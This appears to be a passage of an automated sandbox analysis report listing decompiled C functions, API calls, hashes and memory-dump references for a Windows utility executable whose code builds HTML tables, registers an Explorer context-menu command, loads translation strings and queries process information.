                                                                                                                0x00407906
                                                                                                                0x00407909
                                                                                                                0x0040790f
                                                                                                                0x0040791d
                                                                                                                0x00407923
                                                                                                                0x0040792d
                                                                                                                0x00407932
                                                                                                                0x0040793b
                                                                                                                0x00407942
                                                                                                                0x00407943
                                                                                                                0x0040794c
                                                                                                                0x00407953
                                                                                                                0x00407954
                                                                                                                0x00407959
                                                                                                                0x0040795c
                                                                                                                0x00407961
                                                                                                                0x0040796c
                                                                                                                0x00407971
                                                                                                                0x0040797a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00407838
                                                                                                                0x00407838
                                                                                                                0x0040783a
                                                                                                                0x00407980
                                                                                                                0x0040798a
                                                                                                                0x004079a1

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                • API String ID: 1607361635-601624466
                                                                                                                • Opcode ID: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                • Instruction ID: c59e53cc54c64df10e6b193e6b6ea7c08fa255db16bc08a9aa92b01e8cbfba7b
                                                                                                                • Opcode Fuzzy Hash: 79dd95c05abc82e9b2e709e2cd57865f98d2b899bba57f456d4bed9a2e0af9fd
                                                                                                                • Instruction Fuzzy Hash: C8618E31940208EFDF14AF95CC85EAE7B79FF44310F1041AAF905BA2D2DB34AA54DB99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407B5D, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 40%
                                                                                                                			E00407B5D(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16, char _a20, intOrPtr _a24) {
				void _v514;
				char _v516;
				void _v1026;
				long _v1028;
				void _v1538;
				char _v1540;
				void _v2050;
				char _v2052;
				char _v2564;
				char _v35332;
				char _t51;
				intOrPtr* _t54;
				void* _t61;
				intOrPtr* _t73;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				E0040B550(0x8a00, __ecx);
				_v2052 = 0;
				memset( &_v2050, 0, 0x1fc);
				_v1540 = 0;
				memset( &_v1538, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t79 = _t78 + 0x24;
				if(_a20 != 0xffffffff) {
					_push(E0040ADC0(_a20,  &_v2564));
					_push(L" bgcolor=\"%s\"");
					_push(0xff);
					_push( &_v2052);
					L0040B1EC();
					_t79 = _t79 + 0x18;
				}
				if(_a24 != 0xffffffff) {
					_push(E0040ADC0(_a24,  &_v2564));
					_push(L"<font color=\"%s\">");
					_push(0xff);
					_push( &_v1540);
					L0040B1EC();
					wcscpy( &_v1028, L"</font>");
					_t79 = _t79 + 0x20;
				}
				_push( &_v2052);
				_push(L"<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n");
				_push(0x3fff);
				_push( &_v35332);
				L0040B1EC();
				_t80 = _t79 + 0x10;
				E00407343(_a4, _a8,  &_v35332);
				_t51 = _a16;
				if(_t51 > 0) {
					_t73 = _a12 + 4;
					_a20 = _t51;
					do {
						_v516 = 0;
						memset( &_v514, 0, 0x1fc);
						_t54 =  *_t73;
						_t81 = _t80 + 0xc;
						if( *_t54 == 0) {
							_v516 = 0;
						} else {
							_push(_t54);
							_push(L" width=\"%s\"");
							_push(0xff);
							_push( &_v516);
							L0040B1EC();
							_t81 = _t81 + 0x10;
						}
						_push( &_v1028);
						_push( *((intOrPtr*)(_t73 - 4)));
						_push( &_v1540);
						_push( &_v516);
						_push(L"<th%s>%s%s%s\r\n");
						_push(0x3fff);
						_push( &_v35332);
						L0040B1EC();
						_t80 = _t81 + 0x1c;
						_t61 = E00407343(_a4, _a8,  &_v35332);
						_t73 = _t73 + 8;
						_t36 =  &_a20;
						 *_t36 = _a20 - 1;
					} while ( *_t36 != 0);
					return _t61;
				}
				return _t51;
			}





















                                                                                                                0x00407b65
                                                                                                                0x00407b7c
                                                                                                                0x00407b83
                                                                                                                0x00407b91
                                                                                                                0x00407b98
                                                                                                                0x00407ba6
                                                                                                                0x00407bad
                                                                                                                0x00407bb2
                                                                                                                0x00407bb9
                                                                                                                0x00407bca
                                                                                                                0x00407bcb
                                                                                                                0x00407bd6
                                                                                                                0x00407bdb
                                                                                                                0x00407bdc
                                                                                                                0x00407be1
                                                                                                                0x00407be1
                                                                                                                0x00407be8
                                                                                                                0x00407bf9
                                                                                                                0x00407bfa
                                                                                                                0x00407c05
                                                                                                                0x00407c0a
                                                                                                                0x00407c0b
                                                                                                                0x00407c1c
                                                                                                                0x00407c21
                                                                                                                0x00407c21
                                                                                                                0x00407c2a
                                                                                                                0x00407c2b
                                                                                                                0x00407c36
                                                                                                                0x00407c3b
                                                                                                                0x00407c3c
                                                                                                                0x00407c41
                                                                                                                0x00407c51
                                                                                                                0x00407c56
                                                                                                                0x00407c5b
                                                                                                                0x00407c65
                                                                                                                0x00407c68
                                                                                                                0x00407c6b
                                                                                                                0x00407c74
                                                                                                                0x00407c7b
                                                                                                                0x00407c80
                                                                                                                0x00407c82
                                                                                                                0x00407c88
                                                                                                                0x00407ca6
                                                                                                                0x00407c8a
                                                                                                                0x00407c8a
                                                                                                                0x00407c8b
                                                                                                                0x00407c96
                                                                                                                0x00407c9b
                                                                                                                0x00407c9c
                                                                                                                0x00407ca1
                                                                                                                0x00407ca1
                                                                                                                0x00407cb3
                                                                                                                0x00407cb4
                                                                                                                0x00407cbd
                                                                                                                0x00407cc4
                                                                                                                0x00407cc5
                                                                                                                0x00407cd0
                                                                                                                0x00407cd5
                                                                                                                0x00407cd6
                                                                                                                0x00407cdb
                                                                                                                0x00407ceb
                                                                                                                0x00407cf0
                                                                                                                0x00407cf3
                                                                                                                0x00407cf3
                                                                                                                0x00407cf3
                                                                                                                0x00000000
                                                                                                                0x00407cfc
                                                                                                                0x00407d00

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintf$memset$wcscpy
                                                                                                                • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                • API String ID: 2000436516-3842416460
                                                                                                                • Opcode ID: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                • Instruction ID: 17ce3237ebe69143205905a5a122d9f10e08837d2ebaecd13bb40ff2a02a5a8b
                                                                                                                • Opcode Fuzzy Hash: d00ccfce514861463375abe2e6db6ffc98356b9832555c3fb27b3b8e17e2f823
                                                                                                                • Instruction Fuzzy Hash: EA413371D40219AAEB20EB55CC86FAB737CFF45304F0440BAB918B6191D774AB948FA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404415, Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 124registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 51%
                                                                                                                			E00404415(void* __ecx, void* __eflags, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v24;
				intOrPtr _v28;
				short _v32;
				void _v2078;
				signed int _v2080;
				void _v4126;
				char _v4128;
				void _v6174;
				char _v6176;
				void _v8222;
				char _v8224;
				signed int _t49;
				short _t55;
				intOrPtr _t56;
				int _t73;
				intOrPtr _t78;

				_t76 = __ecx;
				E0040B550(0x201c, __ecx);
				_t73 = 0;
				if(E004043F8( &_v8, 0x2001f) != 0) {
					L6:
					return _t73;
				}
				_v6176 = 0;
				memset( &_v6174, 0, 0x7fe);
				_t78 = _a4;
				_push(_t78 + 0x20a);
				_push(_t78);
				_push(L"%s\\shell\\%s\\command");
				_push(0x3ff);
				_push( &_v6176);
				L0040B1EC();
				if(E00409ECC(_t76, _v8,  &_v6176,  &_v12) == 0) {
					_t49 = E00409EF4(_v12, 0x40c4e8, _t78 + 0x414);
					asm("sbb ebx, ebx");
					_t73 =  ~_t49 + 1;
					RegCloseKey(_v12);
					_v2080 = _v2080 & 0x00000000;
					memset( &_v2078, 0, 0x7fe);
					E00404AD9( &_v2080);
					if(_v2078 == 0x3a) {
						_t55 =  *L"C:\\"; // 0x3a0043
						_v32 = _t55;
						_t56 =  *0x40ccdc; // 0x5c
						_v28 = _t56;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_v32 = _v2080;
						if(GetDriveTypeW( &_v32) == 3) {
							_v4128 = 0;
							memset( &_v4126, 0, 0x7fe);
							_v8224 = 0;
							memset( &_v8222, 0, 0x7fe);
							_push(_a4 + 0x20a);
							_push(_a4);
							_push(L"%s\\shell\\%s");
							_push(0x3ff);
							_push( &_v8224);
							L0040B1EC();
							_push( &_v2080);
							_push(L"\"%s\",0");
							_push(0x3ff);
							_push( &_v4128);
							L0040B1EC();
							E00409F1A(_t76, _v8,  &_v8224,  &_v4128);
						}
					}
				}
				RegCloseKey(_v8);
				goto L6;
			}





















                                                                                                                0x00404415
                                                                                                                0x0040441d
                                                                                                                0x0040442c
                                                                                                                0x00404435
                                                                                                                0x004045b3
                                                                                                                0x004045b7
                                                                                                                0x004045b7
                                                                                                                0x0040444b
                                                                                                                0x00404452
                                                                                                                0x00404457
                                                                                                                0x00404460
                                                                                                                0x00404461
                                                                                                                0x00404462
                                                                                                                0x0040446d
                                                                                                                0x00404472
                                                                                                                0x00404473
                                                                                                                0x00404490
                                                                                                                0x004044a5
                                                                                                                0x004044b4
                                                                                                                0x004044b6
                                                                                                                0x004044b7
                                                                                                                0x004044bd
                                                                                                                0x004044cf
                                                                                                                0x004044db
                                                                                                                0x004044eb
                                                                                                                0x004044f1
                                                                                                                0x004044f6
                                                                                                                0x004044f9
                                                                                                                0x004044fe
                                                                                                                0x00404506
                                                                                                                0x00404507
                                                                                                                0x00404508
                                                                                                                0x00404510
                                                                                                                0x00404521
                                                                                                                0x00404532
                                                                                                                0x00404539
                                                                                                                0x00404547
                                                                                                                0x0040454e
                                                                                                                0x0040455b
                                                                                                                0x0040455c
                                                                                                                0x00404564
                                                                                                                0x0040456f
                                                                                                                0x00404570
                                                                                                                0x00404571
                                                                                                                0x0040457c
                                                                                                                0x0040457d
                                                                                                                0x00404588
                                                                                                                0x00404589
                                                                                                                0x0040458a
                                                                                                                0x004045a0
                                                                                                                0x004045a5
                                                                                                                0x00404521
                                                                                                                0x004044eb
                                                                                                                0x004045ab
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00404452
                                                                                                                • _snwprintf.MSVCRT ref: 00404473
                                                                                                                  • Part of subcall function 00409ECC: RegCreateKeyExW.ADVAPI32(?,?,00000000,0040C4E8,00000000,000F003F,00000000,?,?,?,?,0040448B,?,?,?,?), ref: 00409EEC
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0002001F,?,?,0040390E,?), ref: 004045AB
                                                                                                                  • Part of subcall function 00409EF4: wcslen.MSVCRT ref: 00409EF8
                                                                                                                  • Part of subcall function 00409EF4: RegSetValueExW.ADVAPI32(004044AA,004044AA,00000000,00000001,004044AA,?,004044AA,?,0040C4E8,?,?,?,?,0002001F), ref: 00409F13
                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,0002001F,?,?,0040390E,?), ref: 004044B7
                                                                                                                • memset.MSVCRT ref: 004044CF
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • GetDriveTypeW.KERNEL32(?), ref: 00404518
                                                                                                                • memset.MSVCRT ref: 00404539
                                                                                                                • memset.MSVCRT ref: 0040454E
                                                                                                                • _snwprintf.MSVCRT ref: 00404571
                                                                                                                • _snwprintf.MSVCRT ref: 0040458A
                                                                                                                  • Part of subcall function 00409F1A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409F57
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$Close_snwprintf$CreateDriveFileModuleNameTypeValuewcslen
                                                                                                                • String ID: "%s",0$%s\shell\%s$%s\shell\%s\command$:$C:\
                                                                                                                • API String ID: 486436031-734527199
                                                                                                                • Opcode ID: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                • Instruction ID: 27235bf79c6ca8476a2d09a82ed3c32274241934b1c07e7e02f5f4f3263a5ff1
                                                                                                                • Opcode Fuzzy Hash: 1a4cdad823c9c3dfd4e992b957ed6e3c88109aac474059595a3945d4247565ab
                                                                                                                • Instruction Fuzzy Hash: A4410EB294021CFADB20DB95CC85DDFB6BCEF44304F0084B6B608F2191E7789B559BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040645E, Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 95COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 87%
                                                                                                                			E0040645E(void* __ecx, void* __eflags, struct HINSTANCE__* _a4, wchar_t* _a8) {
				void _v530;
				char _v532;
				void _v1042;
				long _v1044;
				long _v4116;
				char _v5164;
				void* __edi;
				void* _t27;
				void* _t38;
				void* _t44;

				E0040B550(0x142c, __ecx);
				_v1044 = 0;
				memset( &_v1042, 0, 0x1fc);
				_v532 = 0;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_pop(_t44);
				E00405AA7( &_v5164);
				_t27 = E0040B04D( &_v5164,  &_v532);
				_t61 = _t27;
				if(_t27 != 0) {
					wcscpy( &_v1044,  &_v4116);
					_pop(_t44);
				}
				wcscpy(0x40fb90, _a8);
				wcscpy(0x40fda0, L"general");
				E00405FAC(_t61, L"TranslatorName", 0x40c4e8, 0);
				E00405FAC(_t61, L"TranslatorURL", 0x40c4e8, 0);
				E00405FAC(_t61, L"Version",  &_v1044, 1);
				E00405FAC(_t61, L"RTL", "0", 0);
				EnumResourceNamesW(_a4, 4, E0040620E, 0);
				EnumResourceNamesW(_a4, 5, E0040620E, 0);
				wcscpy(0x40fda0, L"strings");
				_t38 = E00406337(_t44, _t61, _a4);
				 *0x40fb90 =  *0x40fb90 & 0x00000000;
				return _t38;
			}













                                                                                                                0x00406466
                                                                                                                0x0040647d
                                                                                                                0x00406484
                                                                                                                0x00406499
                                                                                                                0x004064a0
                                                                                                                0x004064af
                                                                                                                0x004064b4
                                                                                                                0x004064bb
                                                                                                                0x004064cd
                                                                                                                0x004064d2
                                                                                                                0x004064d4
                                                                                                                0x004064e4
                                                                                                                0x004064ea
                                                                                                                0x004064ea
                                                                                                                0x004064f3
                                                                                                                0x00406503
                                                                                                                0x00406514
                                                                                                                0x00406525
                                                                                                                0x0040653b
                                                                                                                0x0040654e
                                                                                                                0x00406568
                                                                                                                0x00406572
                                                                                                                0x0040657a
                                                                                                                0x00406582
                                                                                                                0x0040658a
                                                                                                                0x00406596

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00406484
                                                                                                                • memset.MSVCRT ref: 004064A0
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                  • Part of subcall function 0040B04D: GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                                  • Part of subcall function 0040B04D: ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                                  • Part of subcall function 0040B04D: GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                                  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                                  • Part of subcall function 0040B04D: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                                  • Part of subcall function 0040B04D: _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                                  • Part of subcall function 0040B04D: wcscpy.MSVCRT ref: 0040B128
                                                                                                                • wcscpy.MSVCRT ref: 004064E4
                                                                                                                • wcscpy.MSVCRT ref: 004064F3
                                                                                                                • wcscpy.MSVCRT ref: 00406503
                                                                                                                • EnumResourceNamesW.KERNEL32(00406602,00000004,0040620E,00000000), ref: 00406568
                                                                                                                • EnumResourceNamesW.KERNEL32(00406602,00000005,0040620E,00000000), ref: 00406572
                                                                                                                • wcscpy.MSVCRT ref: 0040657A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
                                                                                                                • String ID: RTL$SFM$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                • API String ID: 3037099051-2314623505
                                                                                                                • Opcode ID: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                • Instruction ID: e6de4c2f5101c47608bcafe23e33f00a3ad23f8f2b1db811bf874d9a9dfc23cd
                                                                                                                • Opcode Fuzzy Hash: 7fb88fb6233af2db2d2511ed574e16bdb1e94482582c0cb23d08965938a53254
                                                                                                                • Instruction Fuzzy Hash: ED21547294021875DB20B756DC4BECF3A6CEF44754F0105BBB508B21D2D7BC5A9489ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409A94, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 154libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00409A94(long _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				char _v60;
				void _v315;
				char _v316;
				void _v826;
				char _v828;
				void _v1338;
				char _v1340;
				void* __esi;
				void* _t61;
				_Unknown_base(*)()* _t93;
				void* _t94;
				int _t106;
				void* _t108;
				void* _t110;

				_v828 = 0;
				memset( &_v826, 0, 0x1fe);
				_v1340 = 0;
				memset( &_v1338, 0, 0x1fe);
				_t110 = _t108 + 0x18;
				_t61 = OpenProcess(0x400, 0, _a4);
				_t113 = _t61;
				_v20 = _t61;
				if(_t61 == 0) {
					L11:
					if(_v828 == 0) {
						__eflags = 0;
						return 0;
					}
					_push( &_v828);
					_push( &_v1340);
					_push(L"%s\\%s");
					_push(0xff);
					_push(_a8);
					L0040B1EC();
					return 1;
				}
				_v8 = 0;
				_v24 = 0;
				E00408F92( &_v8, _t113, _t61, 8,  &_v24);
				_t106 = _v24;
				if(_t106 == 0) {
					_t32 =  &_v20; // 0x4059ec
					E00409555( *_t32,  &_v36,  &_v44,  &_v52,  &_v60);
					_v316 = 0;
					memset( &_v315, 0, 0xfe);
					_t110 = _t110 + 0x20;
					_v16 = 0xff;
					__eflags = E00409A46(0x41c4b4, _a4,  &_v316,  &_v16, _v36, _v32);
					if(__eflags == 0) {
						L9:
						CloseHandle(_v20);
						if(_v8 != 0) {
							FreeLibrary(_v8);
						}
						goto L11;
					}
					_push( &_v28);
					_push( &_a4);
					_push( &_v1340);
					_push( &_v12);
					_push( &_v828);
					_a4 = 0xff;
					_push( &_v316);
					L8:
					_v12 = 0xff;
					E0040906D( &_v8, _t117);
					goto L9;
				}
				_v316 = 0;
				memset( &_v315, 0, 0xff);
				_v12 = _t106;
				_t110 = _t110 + 0xc;
				_a4 = 0;
				if(E00408F72( &_v8) == 0) {
					goto L9;
				}
				_t93 = GetProcAddress(_v8, "GetTokenInformation");
				if(_t93 == 0) {
					goto L9;
				}
				_t94 =  *_t93(_v12, 1,  &_v316, 0xff,  &_a4);
				_t117 = _t94;
				if(_t94 == 0) {
					goto L9;
				}
				_push( &_v28);
				_push( &_v12);
				_push( &_v1340);
				_push( &_v16);
				_push( &_v828);
				_push(_v316);
				_v16 = 0xff;
				goto L8;
			}



























                                                                                                                0x00409ab0
                                                                                                                0x00409ab7
                                                                                                                0x00409ac8
                                                                                                                0x00409acf
                                                                                                                0x00409ad4
                                                                                                                0x00409ae0
                                                                                                                0x00409ae6
                                                                                                                0x00409ae8
                                                                                                                0x00409af0
                                                                                                                0x00409c3a
                                                                                                                0x00409c41
                                                                                                                0x00409c67
                                                                                                                0x00000000
                                                                                                                0x00409c67
                                                                                                                0x00409c49
                                                                                                                0x00409c50
                                                                                                                0x00409c51
                                                                                                                0x00409c56
                                                                                                                0x00409c57
                                                                                                                0x00409c5a
                                                                                                                0x00000000
                                                                                                                0x00409c64
                                                                                                                0x00409b00
                                                                                                                0x00409b03
                                                                                                                0x00409b06
                                                                                                                0x00409b0b
                                                                                                                0x00409b10
                                                                                                                0x00409ba9
                                                                                                                0x00409bac
                                                                                                                0x00409bc1
                                                                                                                0x00409bc7
                                                                                                                0x00409bcc
                                                                                                                0x00409bd8
                                                                                                                0x00409bf0
                                                                                                                0x00409bf2
                                                                                                                0x00409c23
                                                                                                                0x00409c26
                                                                                                                0x00409c2f
                                                                                                                0x00409c34
                                                                                                                0x00409c34
                                                                                                                0x00000000
                                                                                                                0x00409c2f
                                                                                                                0x00409bf7
                                                                                                                0x00409bfb
                                                                                                                0x00409c02
                                                                                                                0x00409c06
                                                                                                                0x00409c0d
                                                                                                                0x00409c14
                                                                                                                0x00409c17
                                                                                                                0x00409c18
                                                                                                                0x00409c1b
                                                                                                                0x00409c1e
                                                                                                                0x00000000
                                                                                                                0x00409c1e
                                                                                                                0x00409b1f
                                                                                                                0x00409b25
                                                                                                                0x00409b2a
                                                                                                                0x00409b2d
                                                                                                                0x00409b33
                                                                                                                0x00409b3d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409b4b
                                                                                                                0x00409b53
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409b6a
                                                                                                                0x00409b6c
                                                                                                                0x00409b6e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409b77
                                                                                                                0x00409b7b
                                                                                                                0x00409b82
                                                                                                                0x00409b86
                                                                                                                0x00409b8d
                                                                                                                0x00409b8e
                                                                                                                0x00409b94
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00409AB7
                                                                                                                • memset.MSVCRT ref: 00409ACF
                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                • _snwprintf.MSVCRT ref: 00409C5A
                                                                                                                  • Part of subcall function 00408F92: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 00408FA8
                                                                                                                • memset.MSVCRT ref: 00409B25
                                                                                                                • GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                • memset.MSVCRT ref: 00409BC7
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.302409416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.302399582.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302516782.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.302548123.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.303387158.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$AddressProc$CloseFreeHandleLibraryOpenProcess_snwprintf
                                                                                                                • String ID: %s\%s$GetTokenInformation$Y@
                                                                                                                • API String ID: 3504373036-27875219
                                                                                                                • Opcode ID: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                • Instruction ID: eda2fbc970d96949daa6443d9737cdff9b2c135ab99c7c98679ff10ae30762ca
                                                                                                                • Opcode Fuzzy Hash: fa417e9f9b304094a666d2d32e69bd60d5871efe85622ded7a3fc1f13b21d4e3
                                                                                                                • Instruction Fuzzy Hash: E451C9B2C0021DBADB51EB95DC81DEFBBBDEB44344F1045BAB505B2191EA349F84CBA4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409172, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00409172() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t5;

				if( *0x4101bc != 0) {
					return _t1;
				}
				_t2 = E00405436(L"psapi.dll");
				_t5 = _t2;
				if(_t5 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t5, "GetModuleBaseNameW");
					 *0x40f848 = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t5, "EnumProcessModules");
						 *0x40f840 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t5, "GetModuleFileNameExW");
							 *0x40f838 = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t5, "EnumProcesses");
								 *0x40fa6c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t5, "GetModuleInformation");
									 *0x40f844 = _t2;
									if(_t2 != 0) {
										 *0x4101bc = 1;
									}
								}
							}
						}
					}
					if( *0x4101bc == 0) {
						_t2 = FreeLibrary(_t5);
					}
					goto L10;
				}
			}






                                                                                                                0x00409179
                                                                                                                0x00409209
                                                                                                                0x00409209
                                                                                                                0x00409185
                                                                                                                0x0040918a
                                                                                                                0x0040918f
                                                                                                                0x00409208
                                                                                                                0x00000000
                                                                                                                0x00409191
                                                                                                                0x0040919e
                                                                                                                0x004091a2
                                                                                                                0x004091a7
                                                                                                                0x004091af
                                                                                                                0x004091b3
                                                                                                                0x004091b8
                                                                                                                0x004091c0
                                                                                                                0x004091c4
                                                                                                                0x004091c9
                                                                                                                0x004091d1
                                                                                                                0x004091d5
                                                                                                                0x004091da
                                                                                                                0x004091e2
                                                                                                                0x004091e6
                                                                                                                0x004091eb
                                                                                                                0x004091ed
                                                                                                                0x004091ed
                                                                                                                0x004091eb
                                                                                                                0x004091da
                                                                                                                0x004091c9
                                                                                                                0x004091b8
                                                                                                                0x004091ff
                                                                                                                0x00409202
                                                                                                                0x00409202
                                                                                                                0x00000000
                                                                                                                0x004091ff

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                  • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                  • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 0040919E
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004091AF
